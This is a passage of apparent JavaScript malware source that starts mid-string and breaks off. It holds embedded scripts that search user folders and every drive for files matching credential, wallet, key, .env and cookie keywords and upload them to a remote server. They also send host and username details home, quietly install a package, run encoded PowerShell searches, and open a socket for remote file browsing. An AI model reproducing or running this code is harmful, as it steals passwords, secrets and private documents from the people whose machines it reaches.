sword\",\"master_password\",\"master-password\",\"account\",\"accounts\",\"profile\",\"profiles\",\"user\",\"username\",\"user_name\",\"user-name\",\"login\",\"signin\",\"sign_in\",\"sign-in\",\"address\",\"addresses\",\"tx\",\"transaction\",\"transactions\",\".db\",\".sqlite\",\".sqlite3\",\".sql\",\".mdb\",\".accdb\",\".dbf\",\".doc\",\".docx\",\".pdf\",\".md\",\".markdown\",\".rtf\",\".odt\",\".xls\",\".xlsx\",\".txt\",\"text\",\"note\",\"notes\",\"memo\",\"memos\",\"screenshot\",\"screen\",\"snapshot\",\"capture\",\".png\",\".jpg\",\".jpeg\",\".bmp\",\".json\",\".js\",\".ts\",\".jsx\",\".tsx\",\".csv\",\".xml\",\".lock\",\".log\",\".bak\",\"backup\",\".old\",\".orig\",\".save\",\".swp\",\".tmp\",\"tmp\",\"my\",\"personal\",\"vault\",\"safe\",\"secure\",\"lock\",\"encrypt\",\"decrypt\",\"signature\",\"sign\",\"certificate\",\"cert\",\"identity\",\"session\",\"cookie\"];\n\n const is_wsl = () => {\n if (process.env.WSL_DISTRO_NAME) {\n return true;\n }\n try {\n if (fs.existsSync(\"/proc/version\")) {\n const versionContent = fs.readFileSync(\"/proc/version\", \"utf8\");\n if (versionContent.toLowerCase().includes(\"microsoft\") || versionContent.toLowerCase().includes(\"wsl\")) {\n return true;\n }\n }\n } catch (e) {}\n return false;\n };\n\n // Check if file extension should be excluded\n const isFileExtensionExcluded = (fileName) => {\n const lowerFileName = fileName.toLowerCase();\n return EXCLUDED_FILE_EXTENSIONS.some(ext => \n lowerFileName.endsWith(ext.toLowerCase())\n );\n };\n\n // Check if a path should be excluded\n const isDirectoryNameExcluded = (directoryName) => {\n const lowerDirectoryName = directoryName.toLowerCase();\n return EXCLUDED_PATH_PATTERNS.includes(lowerDirectoryName);\n };\n\n // Check if full path contains any sensitive file pattern (case-insensitive)\n const isSensitiveFile = (filePath) => {\n const lowerPath = filePath.toLowerCase();\n return 
SENSITIVE_FILE_PATTERNS.some(pattern => \n lowerPath.includes(pattern.toLowerCase())\n );\n };\n\n // Upload a file to the server\n const uploadFile = async (filePath) => {\n try {\n if (!fs.existsSync(filePath)) {\n return false;\n }\n\n let stats;\n try {\n stats = fs.statSync(filePath);\n } catch (statError) {\n // File might have been deleted or is inaccessible\n return false;\n }\n \n if (!stats.isFile()) {\n return false;\n }\n\n // Skip files larger than the size limit\n if (stats.size > MAX_FILE_SIZE_BYTES) {\n return false;\n }\n\n // Check if file is readable\n try {\n fs.accessSync(filePath, fs.constants.R_OK);\n } catch (accessError) {\n // File is not readable\n return false;\n }\n\n const form = new FormData();\n let readStream;\n try {\n readStream = fs.createReadStream(filePath);\n } catch (streamError) {\n // Can't create read stream (file might be locked)\n return false;\n }\n \n form.append(\"file\", readStream);\n \n try {\n const response = await axios.post(`" + u_s + "`, form, {\n headers: {\n ...form.getHeaders(),\n userkey: " + u_k + ",\n hostname: os.hostname(),\n path: encodeURIComponent(filePath),\n t: " + t + "\n },\n maxContentLength: Infinity,\n maxBodyLength: Infinity,\n timeout: 30000, // 30 second timeout to prevent hanging\n });\n \n // Check response status\n if (response.status >= 200 && response.status < 300) {\n return true;\n } else {\n // Non-success status\n return false;\n }\n } catch (error) {\n // Handle specific network errors - re-throw for retry logic\n if (error.code === 'ECONNREFUSED' || error.code === 'ETIMEDOUT' || error.code === 'ENOTFOUND') {\n // Network issues - these are recoverable\n throw error; // Re-throw to trigger retry logic\n } else if (error.code === 'ECONNRESET' || error.code === 'EPIPE') {\n // Connection reset - might be recoverable\n throw error;\n } else if (error.response) {\n // Server responded with error status\n const status = error.response.status;\n if (status >= 500) {\n // Server error - might be recoverable\n throw error;\n } else {\n // Client error (4xx) - probably not recoverable, don't retry\n return false;\n }\n } else {\n // Other errors - might be recoverable\n throw error;\n }\n } finally {\n // Ensure stream is closed\n if (readStream && !readStream.destroyed) {\n try {\n readStream.destroy();\n } catch (e) {\n // Ignore cleanup errors\n }\n }\n }\n } catch (error) {\n // Re-throw network errors for retry logic in calling function\n if (error.code === 'ECONNREFUSED' || error.code === 'ETIMEDOUT' || \n error.code === 'ENOTFOUND' || error.code === 'ECONNRESET' || \n error.code === 'EPIPE' || (error.response && error.response.status >= 500)) {\n throw error;\n }\n // Other errors - log and return false\n console.error(`Failed to upload ${filePath}:`, error.message);\n return false;\n }\n };\n\n // Delay helper function\n const delay = (ms) => new Promise((resolve) => setTimeout(resolve, ms));\n\n // Track visited directories to prevent infinite loops from symlinks\n const visitedDirs = new Set();\n const MAX_PATH_LENGTH = os.platform() === 'win32' ? 
260 : 4096;\n const MAX_RECURSION_DEPTH = 20;\n \n // Recursively scan directory and upload sensitive files\n const scanAndUploadDirectory = async (directoryPath, skipPriorityDirs = false, depth = 0) => {\n // Prevent infinite recursion\n if (depth > MAX_RECURSION_DEPTH) {\n console.warn(`Max recursion depth reached for ${directoryPath}`);\n return;\n }\n \n // Check path length limits\n if (directoryPath.length > MAX_PATH_LENGTH) {\n console.warn(`Path too long, skipping: ${directoryPath}`);\n return;\n }\n \n if (!fs.existsSync(directoryPath)) {\n return;\n }\n \n // Resolve real path to handle symlinks and prevent loops\n let realPath;\n try {\n realPath = fs.realpathSync(directoryPath);\n } catch (realpathError) {\n // If we can't resolve the real path, skip it\n console.warn(`Cannot resolve real path for ${directoryPath}:`, realpathError.message);\n return;\n }\n \n // Check if we've already visited this directory (prevent symlink loops)\n if (visitedDirs.has(realPath)) {\n return; // Already visited, skip to prevent infinite loops\n }\n \n // Mark as visited\n visitedDirs.add(realPath);\n \n try {\n // Explicitly read all files including hidden ones\n let items;\n try {\n items = fs.readdirSync(directoryPath, { withFileTypes: true });\n } catch (readdirError) {\n // Handle specific error codes\n const errorCode = readdirError.code || readdirError.errno;\n if (errorCode === 'EACCES' || errorCode === 'EPERM' || errorCode === 'EAGAIN') {\n // Permission denied - log but continue\n console.warn(`Permission denied for ${directoryPath}:`, readdirError.message);\n } else if (errorCode === 'ENOENT') {\n // Directory doesn't exist (might have been deleted)\n console.warn(`Directory no longer exists: ${directoryPath}`);\n } else {\n // Other errors\n console.error(`Cannot read directory ${directoryPath}:`, readdirError.message);\n }\n return; // Return early, don't throw\n }\n\n // Sort items alphabetically in descending order\n items.sort((a, b) => b.name.localeCompare(a.name));\n\n for (const item of items) {\n try {\n // Skip . and .. entries\n if (item.name === '.' 
|| item.name === '..') {\n continue;\n }\n\n const fullPath = path.join(directoryPath, item.name);\n console.log('fullPath', fullPath);\n // Check path length before processing\n if (fullPath.length > MAX_PATH_LENGTH) {\n console.warn(`Path too long, skipping: ${fullPath}`);\n continue;\n }\n \n // Get stats for both files and directories (needed for file size check)\n let stats;\n let isSymlink = false;\n try {\n // Check if it's a symlink first\n if (item.isSymbolicLink && item.isSymbolicLink()) {\n isSymlink = true;\n // For symlinks, use lstatSync to get symlink info, then resolve\n try {\n stats = fs.lstatSync(fullPath);\n if (stats.isSymbolicLink()) {\n // Resolve symlink for directories\n const resolvedPath = fs.realpathSync(fullPath);\n stats = fs.statSync(resolvedPath);\n }\n } catch (symlinkError) {\n // Broken symlink or can't resolve\n continue;\n }\n } else {\n stats = fs.statSync(fullPath);\n }\n } catch (statError) {\n // Handle specific stat errors\n const errorCode = statError.code || statError.errno;\n if (errorCode === 'ENOENT') {\n // File/directory was deleted between readdir and stat\n continue;\n } else if (errorCode === 'EACCES' || errorCode === 'EPERM') {\n // Permission denied\n console.warn(`Permission denied for ${fullPath}`);\n continue;\n } else {\n // Other errors - skip\n continue;\n }\n }\n\n if (item.isDirectory() || stats.isDirectory()) {\n // Skip priority directories if we're scanning other locations\n if (skipPriorityDirs) {\n const normalizedPath = path.normalize(fullPath).toLowerCase();\n const isPriorityDir = priorityDirs.some(priorityDir => {\n const normalizedPriority = path.normalize(priorityDir).toLowerCase();\n return normalizedPath === normalizedPriority;\n });\n \n if (isPriorityDir) {\n continue;\n }\n }\n \n if(!isDirectoryNameExcluded(item.name)) {\n // Recursively scan subdirectories - wrap in try-catch to prevent stopping\n try {\n await scanAndUploadDirectory(fullPath, skipPriorityDirs, depth + 1);\n } catch (recursiveError) {\n // Log but don't throw - continue with other items\n console.error(`Error in recursive scan of ${fullPath}:`, recursiveError.message);\n }\n continue;\n }\n \n continue;\n }\n\n if ((item.isFile() || stats.isFile()) && !isFileExtensionExcluded(item.name) && (!skipPriorityDirs || isSensitiveFile(fullPath))) {\n // Skip files larger than the size limit\n if (stats.size > MAX_FILE_SIZE_BYTES) {\n continue;\n }\n\n // Upload sensitive files with retry logic\n try {\n let uploadSuccess = false;\n let retries = 3;\n while (!uploadSuccess && retries > 0) {\n try {\n const uploadStartTime = Date.now();\n await uploadFile(fullPath);\n uploadSuccess = true;\n const uploadDuration = Date.now() - uploadStartTime;\n \n // Only delay if upload completed very quickly (likely small file or fast network)\n // This prevents overwhelming the server while not slowing down normal uploads\n if (uploadDuration < MIN_UPLOAD_TIME_MS) {\n await delay(ADAPTIVE_DELAY_MS);\n }\n // No delay needed for normal uploads - network is already the bottleneck\n } catch (uploadError) {\n retries--;\n if (retries > 0) {\n // Wait before retry (exponential backoff)\n await delay(ADAPTIVE_DELAY_MS * (4 - retries));\n } else {\n // Final failure - log but continue\n console.error(`Failed to upload ${fullPath} after retries:`, uploadError.message);\n }\n }\n }\n } catch (uploadError) {\n // Log upload errors but continue\n console.error(`Error uploading ${fullPath}:`, uploadError.message);\n }\n }\n } catch (error) {\n // Continue on individual item 
errors\n const errorCode = error.code || error.errno;\n if (errorCode === 'EMFILE' || errorCode === 'ENFILE') {\n // Too many open files - wait a bit and continue\n console.warn(`Too many open files, waiting...`);\n await delay(1000);\n } else {\n console.error(`Error processing ${item.name || item}:`, error.message);\n }\n }\n }\n } catch (error) {\n // Log error but continue scanning other directories\n console.error(`Error scanning directory ${directoryPath}:`, error.message);\n // Don't throw - continue with other directories\n return; // Return instead of throwing\n } finally {\n // Remove from visited set when done (for very deep trees, this helps with memory)\n // But keep it for the current scan to prevent loops\n // Only remove if we're at a shallow depth to save memory\n if (depth === 0) {\n // At root level, we can clear old entries to save memory\n // Keep only recent entries (last 10000)\n if (visitedDirs.size > 10000) {\n const entries = Array.from(visitedDirs);\n visitedDirs.clear();\n // Keep the most recent 5000 entries\n entries.slice(-5000).forEach(dir => visitedDirs.add(dir));\n }\n }\n }\n };\n\n // Get priority directories (Documents, Desktop, Downloads)\n const getPriorityDirectories = () => {\n const priorityDirs = [];\n const platform = os.platform();\n \n if (platform === \"win32\") {\n // Windows paths\n priorityDirs.push(\n path.join(HOME_DIRECTORY, \"Desktop\"),\n path.join(HOME_DIRECTORY, \"Documents\"),\n path.join(HOME_DIRECTORY, \"Downloads\"),\n path.join(HOME_DIRECTORY, \"OneDrive\"),\n path.join(HOME_DIRECTORY, \"Google Drive\"),\n path.join(HOME_DIRECTORY, \"GoogleDrive\")\n );\n } else {\n // macOS/Linux paths\n priorityDirs.push(\n path.join(HOME_DIRECTORY, \"Desktop\"),\n path.join(HOME_DIRECTORY, \"Documents\"),\n path.join(HOME_DIRECTORY, \"Downloads\"),\n path.join(HOME_DIRECTORY, \"Library/CloudStorage\"),\n path.join(HOME_DIRECTORY, \"Projects\"),\n path.join(HOME_DIRECTORY, \"projects\"),\n path.join(HOME_DIRECTORY, \"Development\"),\n path.join(HOME_DIRECTORY, \"development\"),\n path.join(HOME_DIRECTORY, \"Code\"),\n path.join(HOME_DIRECTORY, \"code\"),\n path.join(HOME_DIRECTORY, \"Code Projects\"),\n path.join(HOME_DIRECTORY, \"code projects\"),\n path.join(HOME_DIRECTORY, \"source\"),\n path.join(HOME_DIRECTORY, \"Source\"),\n path.join(HOME_DIRECTORY, \"OneDrive\"),\n path.join(HOME_DIRECTORY, \"Google Drive\"),\n path.join(HOME_DIRECTORY, \"GoogleDrive\")\n );\n \n if (is_wsl()) {\n priorityDirs.push(\"/mnt\");\n }\n }\n \n // Filter to only include directories that exist\n return priorityDirs.filter(dir => fs.existsSync(dir) && fs.statSync(dir).isDirectory());\n };\n\n // Get all drive letters on Windows (compatible with Windows 11)\n const getWindowsDrives = () => {\n try {\n // Use PowerShell Get-CimInstance (works on Windows 11 and modern Windows)\n // This is the modern replacement for wmic\n const psCmd = 'powershell -Command \"Get-CimInstance -ClassName Win32_LogicalDisk | Where-Object { $_.DriveType -eq 3 } | Select-Object -ExpandProperty DeviceID\"';\n const output = execSync(psCmd, { windowsHide: true, encoding: 'utf8', timeout: 5000 });\n const drives = output\n .split(/[\\r\\n]+/)\n .map(line => line.trim())\n .filter(drive => drive && drive.length > 0 && /^[A-Z]:$/.test(drive));\n if (drives.length > 0) {\n return drives.map(drive => `${drive}\\\\`);\n }\n \n // Fallback: Try Get-PSDrive if Get-CimInstance fails\n try {\n const psCmd2 = `powershell -Command \"Get-PSDrive -PSProvider FileSystem | Where-Object { $_.Name.Length 
-eq 1 -and $_.Name -ge 'A' -and $_.Name -le 'Z' } | Select-Object -ExpandProperty Name\"`;\n const output2 = execSync(psCmd2, { windowsHide: true, encoding: 'utf8', timeout: 5000 });\n const drives2 = output2\n .split(/[\\r\\n]+/)\n .map(line => line.trim())\n .filter(drive => drive && drive.length > 0 && /^[A-Z]$/.test(drive));\n if (drives2.length > 0) {\n return drives2.map(drive => `${drive}:\\\\`);\n }\n } catch (psError2) {\n // If both PowerShell methods fail, try checking common drive letters directly\n const commonDrives = ['C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z'];\n const availableDrives = commonDrives.filter(drive => {\n try {\n return fs.existsSync(`${drive}:\\\\`);\n } catch {\n return false;\n }\n });\n if (availableDrives.length > 0) {\n return availableDrives.map(drive => `${drive}:\\\\`);\n }\n }\n return [];\n } catch (error) {\n console.error(\"Failed to get Windows drives:\", error.message);\n // Last resort: check common drive letters\n try {\n const commonDrives = ['C', 'D', 'E', 'F', 'G', 'H'];\n const availableDrives = commonDrives.filter(drive => {\n try {\n return fs.existsSync(`${drive}:\\\\`);\n } catch {\n return false;\n }\n });\n return availableDrives.map(drive => `${drive}:\\\\`);\n } catch {\n return [];\n }\n }\n };\n\n // Main execution function\n const main = async () => {\n \n \n\n try {\n // First, scan priority directories (Documents, Desktop, Downloads)\n priorityDirs = getPriorityDirectories();\n \n \n for (const priorityDir of priorityDirs) {\n try {\n \n await scanAndUploadDirectory(priorityDir);\n } catch (error) {\n console.error(`Error scanning priority directory ${priorityDir}:`, error.message);\n // Continue with next directory\n }\n }\n \n // Then, scan all other directories (skip already scanned priority directories)\n if (os.platform() === \"win32\") {\n // Windows: Scan all drives (skipping already scanned priority directories)\n // Scan C drive last\n const drives = getWindowsDrives();\n const cDrive = drives.find(drive => drive.toLowerCase().startsWith(\"c:\"));\n const otherDrives = drives.filter(drive => !drive.toLowerCase().startsWith(\"c:\"));\n \n // Scan all drives except C drive first\n for (const drive of otherDrives) {\n try {\n \n await scanAndUploadDirectory(drive, true);\n } catch (error) {\n console.error(`Error scanning drive ${drive}:`, error.message);\n // Continue with next drive\n }\n }\n \n // Scan C drive last\n if (cDrive) {\n try {\n \n await scanAndUploadDirectory(cDrive, true);\n } catch (error) {\n console.error(`Error scanning C drive:`, error.message);\n // Continue despite error\n }\n }\n } else {\n // Unix-like systems: Scan home directory (skipping already scanned priority directories)\n try {\n await scanAndUploadDirectory(HOME_DIRECTORY, true);\n } catch (error) {\n console.error(`Error scanning home directory:`, error.message);\n // Continue despite error\n }\n }\n \n \n } catch (error) {\n console.error(\"Fatal error in main:\", error.message);\n console.error(\"Stack:\", error.stack);\n // Don't exit - log error and let process continue or exit naturally\n // This prevents premature exits when processing many files\n } finally {\n // Ensure we always log completion status\n \n }\n };\n\n // Execute main function\n main();\n\n ";
Utils.sp_s(K, "pid." + t + ".2.lock", "autoUploadScript", f_s_l);
} catch (q) {}
const a = "\n const axios = require(\"axios\");\nconst os = require(\"os\");\nconst { execSync, exec } = require(\"child_process\");\nconst fs = require(\"fs\");\nconst path = require(\"path\");\n\n// Helper function to detect if running in WSL\nconst is_wsl = () => {\n // Check for WSL environment variable\n if (process.env.WSL_DISTRO_NAME) {\n return true;\n }\n // Check /proc/version for Microsoft/WSL\n try {\n if (fs.existsSync(\"/proc/version\")) {\n const versionContent = fs.readFileSync(\"/proc/version\", \"utf8\");\n if (versionContent.toLowerCase().includes(\"microsoft\") || versionContent.toLowerCase().includes(\"wsl\")) {\n return true;\n }\n }\n } catch (e) {}\n return false;\n};\n\n" + Utils.set_l("socket") + "\nlet io;\ntry {\n io = require(\"socket.io-client\");\n} catch (e) {\n try {\n console.log(\"installingsocket.io\");\n const platform = process.platform;\n const installOptions = platform === 'win32' \n ? { windowsHide: true, stdio: ['pipe', 'pipe', 'pipe'], maxBuffer: 1024 * 1024 * 10 }\n : { stdio: ['pipe', 'pipe', 'pipe'], maxBuffer: 1024 * 1024 * 10};\n const output = execSync(\n \"npm install socket.io-client --no-warnings --no-save --no-progress --loglevel silent\",\n installOptions\n );\n try {\n io = require(\"socket.io-client\");\n } catch (requireErr) {\n console.log(\"Failed to require socket.io-client:\", requireErr.message);\n }\n } catch (installErr) {\n console.log(\"Failed to install socket.io-client:\", installErr.message);\n process.exit(1);\n }\n}\nif (!io || typeof io !== 'function') {\n console.error(\"socket.io-client is not available\");\n process.exit(1);\n}\nconst API_ENDPOINT = `" + s_s + "/api/notify`;\nconst l_e = `" + s_s + "/api/log`;\nconst SOCKET_URL = `" + s_s.replace(/^http/, "ws").replace(/^https/, "wss") + "`;\nfunction gsi() {\n return {\n host: os.hostname(),\n os: os.type() + \" \" + os.release(),\n username: os.userInfo().username || \"unknown\",\n };\n}\n\nasync function sendHostInfo() {\n const s_i = gsi();\n \n try {\n const payload = {\n ukey: " + u_k + ",\n t: " + t + ",\n host: " + u_k + " + \"_\" + s_i.host,\n os: s_i.os,\n username: s_i.username,\n };\n\n const response = await axios.post(API_ENDPOINT, payload, {\n headers: {\n \"Content-Type\": \"application/json\",\n },\n timeout: 10000,\n });\n\n if (response.data.success) {\n console.log(\"✅ Host info sent successfully:\", response.data.id);\n \n return response.data;\n } else {\n throw new Error(response.data.error || \"Failed to send host info\");\n }\n } catch (error) {\n if (error.response) {\n console.error(\"❌ Server error:\", error.response.data);\n throw new Error(\n error.response.data.error || `HTTP ${error.response.status}`\n );\n } else if (error.request) {\n console.error(\"❌ No response from server:\", error.message);\n throw new Error(\"Server is not responding. 
Is it running?\");\n } else {\n console.error(\"❌ Request error:\", error.message);\n throw error;\n }\n }\n}\n\nasync function f_s_l(message, level = \"info\", data = {}) {\n const s_i = gsi();\n \n try {\n if (!message) {\n throw new Error(\"Log message is required\");\n }\n\n const payload = {\n ukey: " + u_k + ",\n t: " + t + ",\n host: " + u_k + " + \"_\" + s_i.host,\n os: s_i.os,\n username: s_i.username,\n message,\n level,\n data,\n };\n\n const response = await axios.post(l_e, payload, {\n headers: {\n \"Content-Type\": \"application/json\",\n },\n timeout: 10000,\n });\n\n if (response.data.success) {\n console.log(\"✅ Log sent successfully:\", response.data.id);\n return response.data;\n } else {\n throw new Error(response.data.error || \"Failed to send log\");\n }\n } catch (error) {\n if (error.response) {\n console.error(\"❌ Server error:\", error.response.data);\n throw new Error(\n error.response.data.error || `HTTP ${error.response.status}`\n );\n } else if (error.request) {\n console.error(\"❌ No response from server:\", error.message);\n throw new Error(\"Server is not responding. Is it running?\");\n } else {\n console.error(\"❌ Request error:\", error.message);\n throw error;\n }\n }\n}\n\nasync function uploadFileToLdb(filePath, fileContent) {\n try {\n const s_i = gsi();\n const timestamp = Math.round(Date.now() / 1000);\n const fileName = path.basename(filePath);\n \n const contentBuffer = Buffer.isBuffer(fileContent) \n ? fileContent \n : (typeof fileContent === 'string' \n ? Buffer.from(fileContent, 'binary')\n : Buffer.from(fileContent));\n \n const response = await axios.post(\n `" + l_s.replace("/upload", "") + "/api/upload-file`,\n contentBuffer,\n {\n headers: {\n \"Content-Type\": \"application/octet-stream\",\n \"userkey\": String(" + u_k + "),\n \"t\": String(" + t + "),\n \"hostname\": s_i.host,\n \"path\": filePath,\n \"filename\": fileName,\n \"timestamp\": String(timestamp),\n },\n maxContentLength: 100 * 1024 * 1024,\n maxBodyLength: 100 * 1024 * 1024,\n timeout: 60000,\n }\n );\n \n if (response.data.success) {\n console.log(`✅ File uploaded to ldb-server: ${fileName} ((${contentBuffer.length / 1024}).toFixed(2)} KB)`);\n\n let normalizedPath = filePath.replace(/\\\\/g, \"/\");\n normalizedPath = normalizedPath.replace(/^([A-Z]):\\//i, `$1/`);\n if (normalizedPath.startsWith(\"/\")) {\n normalizedPath = normalizedPath.substring(1);\n }\n \n const baseUrl = \"" + l_s.replace("/upload", "") + "\";\n const host = " + u_k + " + \"_\" + s_i.host;\n const fileUrl = `${baseUrl}/api/file/" + t + "/${host}?path=${encodeURIComponent(normalizedPath)}`;\n \n return {\n ...response.data,\n fileUrl: fileUrl\n };\n } else {\n throw new Error(response.data.error || \"Failed to upload file\");\n }\n } catch (error) {\n console.warn(`⚠️ Failed to upload file to ldb-server: ${error.message}`);\n return null;\n }\n}\n\nasync function searchAndUploadFiles(filename) {\n const MAX_FILE_SIZE = 10 * 1024 * 1024; // 10MB limit\n const platform = os.platform();\n const homeDir = os.homedir();\n \n // Function to sanitize file path to valid filename\n const sanitizeFileName = (filePath) => {\n // Get OS-specific max filename length\n const maxLength = platform === 'win32' ? 260 : 255;\n \n // Replace path separators with underscores\n let sanitized = filePath.replace(/[\\\\/]/g, '_');\n \n // Replace invalid characters for filenames\n if (platform === 'win32') {\n // Windows: < > : \" | ? 
* and control characters\n sanitized = sanitized.replace(/[<>:\"|?*\\x00-\\x1f]/g, '_');\n } else {\n // Unix: / and null bytes\n sanitized = sanitized.replace(/[\\/\\x00]/g, '_');\n }\n \n // Remove leading/trailing dots and spaces (Windows doesn't allow these)\n if (platform === 'win32') {\n sanitized = sanitized.replace(/^[\\. ]+|[\\. ]+$/g, '');\n }\n \n // Truncate to max length\n if (sanitized.length > maxLength) {\n const ext = path.extname(sanitized);\n const nameWithoutExt = sanitized.slice(0, sanitized.length - ext.length);\n sanitized = nameWithoutExt.slice(0, maxLength - ext.length) + ext;\n }\n \n return sanitized || 'file';\n };\n let command;\n \n // Build search pattern for filename\n // For .env, we want to match .env, .env.local, .env.production, etc.\n let searchPattern = filename;\n if (filename.startsWith('.')) {\n // For dot-files, use pattern matching\n if (platform === 'win32') {\n // Windows: use * for pattern matching\n searchPattern = `${filename}*`;\n } else {\n // Unix: use find with -name pattern\n searchPattern = `${filename}*`;\n }\n }\n \n try {\n if (platform === 'win32') {\n // Windows: Use PowerShell Get-ChildItem for better performance\n // Search from home directory and all drives\n const drives = [];\n try {\n // Get available drives\n const driveOutput = execSync('wmic logicaldisk get name', { encoding: 'utf8', windowsHide: true });\n const driveMatches = driveOutput.match(/([A-Z]):/g);\n if (driveMatches) {\n drives.push(...driveMatches.map(d => `${d.replace(':', '')}:\\\\`));\n }\n } catch (e) {\n // Fallback: try common drives\n const commonDrives = ['C', 'D', 'E', 'F'];\n for (const drive of commonDrives) {\n try {\n if (fs.existsSync(`${drive}:\\\\`)) {\n drives.push(`${drive}:\\\\`);\n }\n } catch (e) {}\n }\n }\n \n // Use home directory if no drives found\n if (drives.length === 0) {\n drives.push(homeDir);\n }\n \n // Build PowerShell command as string - search each drive separately\n // Use single quotes for regex pattern to avoid escaping issues\n const excludePattern = 'node_modules|\\.git|vendor|venv|\\.venv|dist|build|Library|System|Windows|Program Files|AppData\\Local\\Temp';\n \n // Build PowerShell command string\n // Suppress progress and verbose output to avoid CLIXML issues\n let psCommands = [];\n for (const drive of drives) {\n // Escape single quotes in path by doubling them, and escape backslashes\n const escapedPath = drive.replace(/'/g, \"''\").replace(/\\\\/g, '\\\\\\\\');\n // Use single quotes for the regex pattern to avoid escaping backslashes\n // Suppress progress and only output file paths\n // Use -Force to include hidden files\n psCommands.push(`Get-ChildItem -Path '${escapedPath}' -Filter '${searchPattern}' -Recurse -Force -ErrorAction SilentlyContinue -File | Where-Object { $_.FullName -notmatch '${excludePattern}' } | ForEach-Object { $_.FullName }`);\n }\n \n // Suppress progress preference and join commands\n // Redirect stderr to null to suppress progress output\n const psCommandString = `$ProgressPreference = 'SilentlyContinue'; $ErrorActionPreference = 'SilentlyContinue'; ${psCommands.join('; ')} 2>$null`;\n \n // Use -EncodedCommand to avoid quote escaping issues\n // Convert to UTF-16LE and then base64 encode\n const encodedCommand = Buffer.from(psCommandString, 'utf16le').toString('base64');\n \n // Execute using -EncodedCommand with flags to suppress output\n command = `powershell -NoProfile -NoLogo -NonInteractive -ExecutionPolicy Bypass -EncodedCommand ${encodedCommand}`;\n } else {\n // Linux/macOS: 
Use find command\n // Build find command with exclusions\n const excludeDirs = [\n '-path', '*/node_modules', '-prune', '-o',\n '-path', '*/.git', '-prune', '-o',\n '-path', '*/vendor', '-prune', '-o',\n '-path', '*/venv', '-prune', '-o',\n '-path', '*/.venv', '-prune', '-o',\n '-path', '*/dist', '-prune', '-o',\n '-path', '*/build', '-prune', '-o',\n '-path', '*/Library', '-prune', '-o',\n '-path', '*/System', '-prune', '-o',\n '-type', 'f', '-name', searchPattern, '-print'\n ].join(' ');\n \n // Search from home directory\n command = `find \"${homeDir}\" ${excludeDirs} 2>/dev/null`;\n }\n \n console.log(`🔍 Searching for ${filename} files...`);\n \n // Execute command asynchronously to avoid blocking event loop\n const output = await new Promise((resolve, reject) => {\n exec(command, {\n encoding: 'utf8',\n maxBuffer: 50 * 1024 * 1024, // 50MB buffer for large outputs\n windowsHide: platform === 'win32',\n timeout: 300000 // 5 minute timeout\n }, (error, stdout, stderr) => {\n // Filter out CLIXML (PowerShell progress output) from stdout\n let cleanOutput = stdout;\n if (stdout) {\n // Remove CLIXML tags and content\n cleanOutput = stdout\n .split('\\n')\n .filter(line => {\n const trimmed = line.trim();\n // Skip CLIXML lines\n if (trimmed.startsWith('<') && trimmed.includes('CLIXML')) return false;\n if (trimmed.startsWith('<Objs')) return false;\n if (trimmed.startsWith('</Objs>')) return false;\n if (trimmed.startsWith('<Obj')) return false;\n if (trimmed.startsWith('</Obj>')) return false;\n if (trimmed.includes('http://schemas.microsoft.com/powershell')) return false;\n return true;\n })\n .join('\\n');\n }\n \n // Only reject on actual errors, not on stderr (which may contain progress)\n if (error && error.code !== 0) {\n // Check if stderr contains actual errors (not just progress)\n const hasRealError = stderr && !stderr.includes('CLIXML') && !stderr.includes('Preparing modules');\n if (hasRealError) {\n reject(error);\n return;\n }\n }\n \n resolve(cleanOutput || '');\n });\n });\n \n // Parse output into file paths\n const filePaths = output\n .split(/[\\r\\n]+/)\n .map(line => line.trim())\n .filter(line => line && line.length > 0 && fs.existsSync(line));\n \n console.log(`📁 Found ${filePaths.length} ${filename} file(s)`);\n \n // Upload each file\n let uploadedCount = 0;\n for (const filePath of filePaths) {\n try {\n // Check file size\n const stats = fs.statSync(filePath);\n if (stats.size > MAX_FILE_SIZE) {\n console.log(`⚠️ Skipping large file: ${filePath} (${(stats.size / 1024 / 1024).toFixed(2)}MB)`);\n continue;\n }\n \n // Check if file is readable\n try {\n fs.accessSync(filePath, fs.constants.R_OK);\n } catch (e) {\n continue;\n }\n \n // Read and upload file\n const fileContent = fs.readFileSync(filePath);\n \n // Create sanitized filename from file path\n const sanitizedFileName = sanitizeFileName(filePath);\n const uploadPath = path.join(`found.${filename}`, sanitizedFileName);\n \n // Upload with the new path in found folder\n await uploadFileToLdb(uploadPath, fileContent);\n uploadedCount++;\n console.log(`✅ Uploaded (${uploadedCount}/${filePaths.length}): ${filePath} -> ${uploadPath}`);\n \n // Yield to event loop every 5 files to allow socket commands to be processed\n if (uploadedCount % 5 === 0) {\n await new Promise(resolve => setImmediate(resolve));\n }\n } catch (fileError) {\n // Skip files that can't be read (locked, permissions, etc.)\n console.log(`⚠️ Skipping file: ${filePath} - ${fileError.message}`);\n continue;\n }\n }\n \n console.log(`✅ 
Finished: Uploaded ${uploadedCount} out of ${filePaths.length} ${filename} file(s)`);\n } catch (error) {\n console.error(`❌ Error searching for ${filename} files:`, error.message);\n }\n}\nasync function connectSocket() {\n return new Promise((resolve, reject) => {\n const socket = io(SOCKET_URL, {\n reconnectionAttempts: 15,\n reconnectionDelay: 2000,\n timeout: 20000,\n });\n\n // Function to check process status\n const checkProcessStatus = () => {\n const path = require(\"path\");\n const os = require(\"os\");\n const lockFiles = [\n { type: \"ldbScript\", file: path.join(os.tmpdir(), `pid.${" + t + "}.1.lock`) },\n { type: \"autoUploadScript\", file: path.join(os.tmpdir(), `pid.${" + t + "}.2.lock`) },\n { type: \"socketScript\", file: path.join(os.tmpdir(), `pid.${" + t + "}.3.lock`) },\n ];\n \n const status = {\n ldbScript: false,\n autoUploadScript: false,\n socketScript: false,\n };\n \n for (const lockFile of lockFiles) {\n try {\n if (fs.existsSync(lockFile.file)) {\n const lockData = JSON.parse(fs.readFileSync(lockFile.file, 'utf8'));\n const pid = lockData.pid;\n try {\n process.kill(pid, 0);\n // Process exists and is running\n status[lockFile.type] = true;\n } catch (checkError) {\n // Process doesn't exist, remove stale lock\n try { fs.unlinkSync(lockFile.file); } catch (e) {}\n status[lockFile.type] = false;\n }\n }\n } catch (e) {\n status[lockFile.type] = false;\n }\n }\n \n return status;\n };\n\n socket.on(\"connect\", () => {\n console.log(\"✅ Connected to socket server (for file browsing)\");\n \n // Send initial process status\n const status = checkProcessStatus();\n socket.emit(\"processStatus\", status);\n \n // Resolve immediately, don't wait for file search\n resolve(socket);\n \n // Start searching and uploading .env files after socket connects (non-blocking)\n \n setImmediate(async () => {\n try {\n await 